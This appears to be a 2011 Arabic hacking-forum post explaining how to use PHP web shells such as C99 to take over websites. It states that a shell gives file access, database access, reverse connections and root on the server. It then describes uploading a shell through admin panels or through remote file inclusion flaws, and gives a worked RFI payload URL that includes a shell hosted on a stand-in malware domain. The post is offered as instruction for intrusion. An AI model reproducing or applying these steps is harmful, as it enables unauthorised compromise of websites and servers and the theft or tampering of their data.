هنا سوف اشــــــــرٍرٍح الشــــــــل لإختراااااااااق المواقع لعيون منتديات ماسة الحب
الشل هو السكربت الخاص باختراق المواقع وليس الشل الخاص باوامر اللينكس .
الشل عبارة عن سكربت مكتوب باحد لغات البرمجه بالغالب تكون php وقد تكون غيرها
وظيفة الشل :
يقوم الشل بعد رفعه للموقع بالتحكم الكامل بالسيرفر
(طبعا على حسب حماية السيرفر و الموقع )
حيث من خلاله تستطيع قراءة وتعديل جميع الملفات على المواقع و احيانا على السيرفر
(حسب حماية السيرفر والموقع )
وتعديل التصاريح والاتصال بقواعد البيانات وحتى الاتصال العكسي بالسيرفر
لاخذ ro0t اي المدير على السيرفر
وللشل وظائف عديده جدا ويختلف من شل الى شل بالخصائص و الميزات
أنصحك لتعرف عن الشل ان تجربه على جهازك بعد تركيب سيرفر شخصي
لتعرف قوة السيرفر وماذا يفعل بالموقع
و السيرفر .
كيفيت رفع الشل :
للشل طريقتان للرفع :
الاولى عن طريق ثغرات الفايل أنكلود .
الثانيه عن طريق لوحات التحكم التي تسمح لك برفع الشل.
ما هي ثغرات فايل انلكود:
لا اريد ان طيل عليكم وشرح لغة php لكي تفهما رغم اني انصح من يريد تعلم الهكر تعلم php
ببساطه هي ثغرات تمكنك من ربط الشل الخاص بك الذي من المفتراض ان يكون
رافعه على احد المواقع المجانيه
بصفحه التي فيها ثغرة عن طريق متغير في الصفحه
مثال بسيط للتوضيح فقط
لنفترض ان الموقع الذي وجد فيه ثغرت فايل انكلود هو
3asfh.com
حيث الصفحه التي فيها المتغير هي مثلا
3asfh.com/er.php
و المتغير الذي نستطيع ربط الشل به هو
zoom
مثلا
تكون الصفحه هكذا
3asfh.com/er.php?zoom
لا حظ علامة الاستفهام يجب ان توضع
لان نربط الشل الخاص الذي من المفترض ان يكون هكذا
zoom.malware-site.www/c99.txt
لاحظ المتداد txt
الان نربط الشل بالصفحة وتكون هكذا
3asfh.com/er.php?zoom=http://zoom.malware-site.www/c99.txt?
لاحظ علامة الاستفهام في الاخير يجب ان تكون علامة الاستفهام في اخر اليمين ذو واجهه عربي
طبعا هذا الشرح لتوضيح فقط ثغرات الفايل انكلود
اما الطريقه الثانيه في لا تحتاج شرح فقط أرفع الشل بصيغة php من خلال لوحة التحكم السكربت الذي وجد فيه ثغرة
اتمنى فقط انه وصلت المعلومة وانا شرحتها بشكل سريع وانشاء وصلت المعلومة
طبعا التطبيق كان على شل روسي : C99
تحياتي لكم
موضوع: شــــــــرٍرٍح الشــــــــل لإختراااااااااق المواقع لعيونكم 
الإثنين سبتمبر 12, 2011 1:37 am